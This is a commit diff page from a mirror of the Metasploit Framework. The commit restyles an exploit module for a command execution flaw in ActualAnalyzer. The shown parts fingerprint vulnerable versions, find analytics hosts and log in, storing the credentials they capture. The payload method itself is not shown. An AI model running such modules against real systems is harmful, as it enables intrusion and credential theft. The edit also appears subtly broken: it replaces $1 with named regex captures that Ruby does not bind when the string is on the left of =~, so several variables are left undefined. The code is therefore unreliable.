infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Minor ruby style cleanup

bug/bundler_fix
Jon Hart 2014-12-12 09:30:44 -08:00
parent 1d1aa5838f
commit 24f1b916e0
1 changed files with 20 additions and 22 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

26
modules/exploits/unix/webapp/actualanalyzer_ant_cookie_exec.rb
View File

@ -1,5 +1,5 @@
##
# This module requires Metasploit: http//metasploit.com/download
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
@ -11,7 +11,8 @@ class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
super(update_info(
info,
'Name' => "ActualAnalyzer 'ant' Cookie Command Execution",
'Description' => %q{
This module exploits a command execution vulnerability in
@ -47,6 +48,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Privileged' => false,
'DisclosureDate' => 'Aug 28 2014',
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [true, 'The base path to ActualAnalyzer', '/lite/']),
@ -77,8 +79,7 @@ class Metasploit3 < Msf::Exploit::Remote
if !res
vprint_error("#{peer} - Connection failed")
return Exploit::CheckCode::Unknown
elsif res.code == 200 && res.body =~ /title="ActualAnalyzer Lite \(free\) ([\d\.]+)"/
version = $1
elsif res.code == 200 && res.body =~ /title="ActualAnalyzer Lite \(free\) (?<version>[\d\.]+)"/
vprint_status("#{peer} - Found version: #{version}")
return Exploit::CheckCode::Vulnerable if Gem::Version.new(version) <= Gem::Version.new('2.81')
return Exploit::CheckCode::Detected
@ -116,13 +117,12 @@ class Metasploit3 < Msf::Exploit::Remote
)
if !res
vprint_error("#{peer} - Connection failed")
elsif res.body =~ /<option value="?[\d]+"?[^>]*>Page: https?:\/\/([^\/^<]+)/
analytics_host = $1
elsif res.body =~ /<option value="?[\d]+"?[^>]*>Page: https?:\/\/(?<analytics_host>[^\/^<]+)/
vprint_good("#{peer} - Found analytics host: #{analytics_host}")
return analytics_host
else
vprint_status("#{peer} - Could not find any hosts on view.php")
end
analytics_host
end
#
@ -138,13 +138,12 @@ class Metasploit3 < Msf::Exploit::Remote
)
if !res
vprint_error("#{peer} - Connection failed")
elsif res.code == 200 && res.body =~ /alt='ActualAnalyzer' src='https?:\/\/([^\/^']+)/
analytics_host = $1
elsif res.code == 200 && res.body =~ /alt='ActualAnalyzer' src='https?:\/\/(?<analytics_host>[^\/^']+)/
vprint_good("#{peer} - Found analytics host: #{analytics_host}")
return analytics_host
else
vprint_status("#{peer} - Could not find any hosts on code.php")
end
analytics_host
end
#
@ -178,8 +177,7 @@ class Metasploit3 < Msf::Exploit::Remote
vprint_error("#{peer} - Connection failed")
elsif res.code == 200 && res.body =~ />Login</
vprint_status("#{peer} - Login failed.")
elsif res.code == 200 && res.body =~ /alt='ActualAnalyzer' src='https?:\/\/([^\/^']+)/
analytics_host = $1
elsif res.code == 200 && res.body =~ /alt='ActualAnalyzer' src='https?:\/\/(?<analytics_host>[^\/^']+)/
vprint_good("#{peer} - Found analytics host: #{analytics_host}")
print_good("#{peer} - Login successful! (#{user}:#{pass})")
service_data = {
@ -191,7 +189,7 @@ class Metasploit3 < Msf::Exploit::Remote
}
credential_data = {
origin_type: :service,
module_fullname: self.fullname,
module_fullname: fullname,
private_type: :password,
private_data: pass,
username: user
@ -205,10 +203,10 @@ class Metasploit3 < Msf::Exploit::Remote
}
login_data.merge!(service_data)
create_credential_login(login_data)
return analytics_host
else
vprint_status("#{peer} - Could not find any hosts on admin.php")
end
analytics_host
end
def exploit